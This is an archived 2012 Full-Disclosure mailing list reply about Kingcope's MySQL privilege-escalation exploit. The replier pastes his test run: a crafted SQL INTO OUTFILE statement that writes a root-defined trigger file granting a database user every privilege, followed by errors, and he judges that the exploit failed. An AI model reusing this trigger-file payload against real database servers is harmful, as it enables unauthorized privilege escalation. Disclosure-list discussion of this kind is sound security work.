| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 3 Dec 2012 15:01:38 -0500
From: Eren Yağdıran <erenyagdiran@...il.com>
To: king cope <isowarez.isowarez.isowarez@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
submit@...sec.com, todd@...ketstormsecurity.org
Subject: Re: MySQL (Linux) Database Privilege Elevation
Zeroday Exploit
Hello guys
i tried this zero day exploit on my local machine
Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
Database client version: libmysql - 5.0.51a
my exploit output is
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/ieee/rootme.TRG'
LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@...calhost`
trigger atk after insert on rootme for each row\\nbegin \\nUPDATE
mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\',
Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\',
Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\',
Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\',
References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\',
Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\',
Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\',
Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\',
Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\',
Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\',
Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\',
Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\',
ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\',
max_connections=\\\'Y\\\' WHERE
User=\\\'ieee\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@...alhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';DBD::mysql::db
do failed: Access denied for user 'ieee'@...calhost' (using password:
YES) at org.pl line 31.
DBD::mysql::db do failed: Access denied for user 'ieee'@...calhost'
(using password: YES) at org.pl line 32.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 35.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 44.
DBD::mysql::db do failed: Access denied; you need the CREATE USER
privilege for this operation at org.pl line 52.
DBD::mysql::db do failed: Access denied for user 'ieee'@...calhost'
(using password: YES) at org.pl line 53.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 54.
DBI connect('host=localhost;','rootedbox2',...) failed: Access denied
for user 'rootedbox2'@...calhost' (using password: YES) at org.pl line
58
Can't call method "prepare" on an undefined value at org.pl line 62.
I think its not working.
On Sat, Dec 1, 2012 at 4:26 PM, king cope
<isowarez.isowarez.isowarez@...glemail.com> wrote:
> (see attachment)
>
> Cheerio,
>
> Kingcope
--
-
Eren Yağdıran
http://www.about.me/eren
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists